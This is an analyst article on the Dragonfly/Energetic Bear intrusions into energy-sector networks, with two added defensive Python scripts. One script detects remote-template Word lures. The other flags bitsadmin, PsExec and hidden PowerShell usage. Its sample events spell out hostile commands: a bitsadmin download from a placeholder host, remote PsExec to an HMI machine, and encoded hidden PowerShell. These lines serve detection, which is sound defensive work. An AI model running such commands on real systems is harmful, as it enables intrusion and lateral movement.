by James Scott, Sr. Fellow, ICIT
Show-of-force intelligence gathering and cyber-kinetic sabotage malware attacks against United States Energy infrastructure are neither novel nor do they warrant the mass hysteria stoked by fear mongers seeking to exploit the incident for personal gain. They are deliberate campaigns meant to demonstrate capabilities while posing no real threat to the distributed U.S. energy grid, and they therefore do not provoke a decisive and overwhelming response from U.S. intelligence agencies.
From 2011 to 2014, the Eastern European threat actor Dragonfly, also known as Energetic Bear, targeted the Defense Industry, Energy Industry, and ICS equipment manufacturers with highly technical, prolonged attacks that are suggestive of a state sponsor. As of 2013, U.S. Energy facilities were the primary target of Energetic Bear, but the adversary also continued to target facilities in Poland, Turkey, and other nations. After nearly two years of minimal activity, Energetic Bear activity was allegedly rediscovered in 2017 after the group compromised over 20 Energy systems in the United States, Turkey, and Switzerland. The advanced persistent threat group is primarily interested in gathering intelligence and establishing persistence on foreign Energy infrastructure as a demonstration of Russian nation-state capabilities, as pre-placement for future sabotage campaigns, or as a stage in cyber-kinetic attacks. The 2017 campaign appears focused on learning how Energy facilities operate and on gaining access to operational systems, such as the interfaces used to send commands to equipment like circuit breakers or ICS/SCADA components.
Dragonfly specializes in targeting organizations with lackadaisical cybersecurity, poor cyber-hygiene, or weak IT-OT separation, as well as tangential third-party networks that could be compromised as part of lateral-access attacks. Common attack vectors include spear-phishing emails, watering-hole attacks featuring niche sites, and trojanization of legitimate software. Reported lures include New Year’s Eve party invitations, but could also include current-events topics such as instructions about how Energy facilities should respond to incoming hurricanes. Opened lures used publicly available tools like the Phishery toolkit (Trojan.Phisherly), obtainable on GitHub, to steal user credentials via a template injection attack and then leak the victim’s network credentials to external servers. The threat actor then leveraged the harvested credentials to install Backdoor.Goodor, Backdoor.Dorshel, or the custom Trojan.Karagany.B to establish persistence on compromised systems and to deliver additional malware. Energetic Bear’s exploit kit features specialized malware, likely developed or adapted by the attackers, that was compiled during business hours (Monday – Friday, 9 am – 6 pm) UTC+4, which corresponds to working hours in Russia or Eastern Europe. Custom malware that strongly links these attacks to Dragonfly includes Trojan.Heriplor, which was custom developed by the APT and is not available on Deep Web markets, and Trojan.Karagany.B, which is not widely available but has been used by the group in past targeted attacks.
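The Phishery-style lure described above works by attaching a remote template to a Word document: when the file is opened, Word fetches the template from the attacker-controlled URL and, if that server demands authentication, prompts the user for credentials. The defensive check is therefore straightforward: inspect the document's relationship metadata for an attached template whose target is a URL or UNC path rather than a local file. The following script is an added example, not code from the ICIT article or from the Phishery project; the minimal `.docx` files it inspects are constructed in memory with a placeholder hostname so it runs offline.

```python
"""Flag .docx files whose attached template points at a remote location.

Added illustration of detecting template-injection lures; not part of the
original article. Sample documents are constructed inline (no real lure).
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

# Word stores the attached-template link in this relationships part.
RELS_PATH = "word/_rels/settings.xml.rels"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")


def is_remote(target):
    """True for http(s) URLs and UNC paths; local file:/// templates are normal."""
    return bool(re.match(r"(?i)^(https?://|\\\\)", target))


def remote_templates(docx_bytes):
    """Return every attachedTemplate target that would be fetched over the network."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if RELS_PATH not in z.namelist():
            return found  # most documents have no settings rels at all
        root = ET.fromstring(z.read(RELS_PATH))
        for rel in root.iter(f"{{{REL_NS}}}Relationship"):
            if rel.get("Type") != ATTACHED_TEMPLATE:
                continue
            target = rel.get("Target", "")
            # Local templates also carry TargetMode="External", so the
            # decision is made on the target scheme, not on the mode flag.
            if rel.get("TargetMode") == "External" and is_remote(target):
                found.append(target)
    return found


def build_docx(template_target=None):
    """Construct a minimal .docx for testing (constructed sample, not a real file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        z.writestr("word/document.xml",
                   "<w:document xmlns:w='http://schemas.openxmlformats.org/wordprocessingml/2006/main'/>")
        if template_target is not None:
            z.writestr(RELS_PATH,
                       f'<Relationships xmlns="{REL_NS}">'
                       f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                       f'Target="{template_target}" TargetMode="External"/>'
                       '</Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    # "placeholder.example" stands in for an attacker-controlled host.
    samples = {
        "lure.docx": build_docx("https://placeholder.example/invite.dotx"),
        "normal.docx": build_docx("file:///C:/Users/jdoe/Templates/Normal.dotm"),
        "plain.docx": build_docx(),
    }
    for name, data in samples.items():
        hits = remote_templates(data)
        print(f"{name}: {'REMOTE TEMPLATE ' + ', '.join(hits) if hits else 'clean'}")
```

In a mail gateway or sandbox this check runs before the user ever opens the file; it does not require the remote server to be reachable, which matters because Phishery-style servers are often taken down or geo-fenced by the time an analyst looks.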
The possibility of credible cyber-kinetic sabotage attacks, while legitimate, is diminished by the distributed nature of the United States Energy grid, the redundancy systems in place, and the likelihood that the sophisticated adversary could adequately anticipate and prudently avoid the attentive response of U.S. intelligence services. The APT has taken screenshots of systems compromised in the 2017 campaign and labeled them with the [machine description and location].[organization name] format. Captures of some systems were labeled with the “cntrl” string, indicating the placement of malware capable of controlling or sabotaging the host. The recent iteration of Dragonfly utilizes more publicly available tools such as PowerShell, PsExec, Bitsadmin, Phishery, and Screenutil, and no use of zero-day exploits has been discovered or disclosed. This could indicate that the group is attempting to obfuscate its activities, that it is actually mercenary in nature, or that the freely available tools and the Malware-as-a-Service market have reached acceptable standards of sophistication, utility, and quality to merit use in a sophisticated campaign, instead of wasting resources developing custom malware that can be used to establish attribution.
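Because the 2017 activity leaned on PowerShell, PsExec, and Bitsadmin rather than bespoke droppers, the detection opportunity shifts from file signatures to process behaviour: a signed Windows binary used with arguments that a normal administrator rarely types. The following script is an added example, not code from the ICIT article; the event format and the sample events are constructed to approximate Sysmon/EDR process-creation records, and the hostname and user are placeholders.

```python
"""Flag living-off-the-land tool usage in process-creation events.

Added example, not part of the original article. Events are constructed
JSON records with Image / CommandLine / User fields.
"""
import json
import re

# (rule name, process image pattern, command-line pattern)
RULES = [
    # bitsadmin pulling a payload from the internet rather than listing jobs
    ("bitsadmin remote transfer", r"bitsadmin\.exe$", r"(?i)/transfer\b.*\bhttps?://"),
    # PsExec aimed at a remote host (lateral movement with harvested credentials)
    ("psexec remote execution", r"psexec(64)?\.exe$", r"\\\\[\w.-]+"),
    # PowerShell with an encoded command, hidden window, or no profile
    ("powershell encoded/hidden",
     r"powershell(_ise)?\.exe$",
     r"(?i)(-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{8,}|-w(indowstyle)?\s+hidden|-nop\b)"),
]


def classify(event):
    """Return the names of every rule that matches one process-creation event."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    return [name for name, img_re, cmd_re in RULES
            if re.search(img_re, image) and re.search(cmd_re, cmd)]


def scan(lines):
    """Scan JSON event lines; return (line number, rule, user) for each finding."""
    findings = []
    for n, line in enumerate(lines, 1):
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed record: skip rather than crash the pipeline
        for rule in classify(ev):
            findings.append((n, rule, ev.get("User", "?")))
    return findings


# Constructed sample events (placeholder host/user; not real telemetry).
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /transfer job /download /priority high "
                    r"https://placeholder.example/update.bin C:\Users\Public\update.bin",
     "User": r"CORP\jdoe"},
    {"Image": r"C:\Tools\PsExec.exe",
     "CommandLine": r"psexec \\hmi-placeholder -s cmd.exe",
     "User": r"CORP\jdoe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFB",
     "User": r"CORP\svc-backup"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Process",
     "User": r"CORP\admin"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /list /allusers",
     "User": r"CORP\admin"},
]]

if __name__ == "__main__":
    for line_no, rule, user in scan(SAMPLE_EVENTS):
        print(f"event {line_no}: {rule} (user {user})")
```

The point of the rules is the pairing of a legitimate image with an unusual argument shape; matching on the tool name alone would page on every administrator who lists BITS jobs or runs a one-line PowerShell query, which is why the last two sample events stay quiet.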
If Dragonfly is a Russian state-sponsored group, then the compromises could be a show of force meant to indirectly respond to recent sanctions placed on the sponsor. If the group is mercenary, the campaign could be a demonstration of skill. In either case, while the capability exists, actual cyber-kinetic impacts similar to the BlackEnergy malware attacks against Ukraine would do little other than draw the ire of the United States and its allies. Considering that Energetic Bear has only just reemerged, the likelihood that it would mount an attack that would necessitate its immediate dispersion is minimal.
Sophisticated Advanced Persistent Threat campaigns from Dragonfly or other adversaries targeting the Energy sector are not novel and will continue as Digital Warfare metastasizes into a distinct theater of geopolitical and socioeconomic conflict. United States critical infrastructure systems, especially those in the Energy sector, can best be protected through layered defense-grade cybersecurity solutions, strict adherence to cyber-hygiene best practices, assignment of need-based access privileges, and comprehensive segregation of IT and OT networks and systems. Multi-factor authentication, robust passwords, and strong at-rest and in-transit data encryption should be required to slow malicious advancement through compromised systems and to limit the impact of any attacks.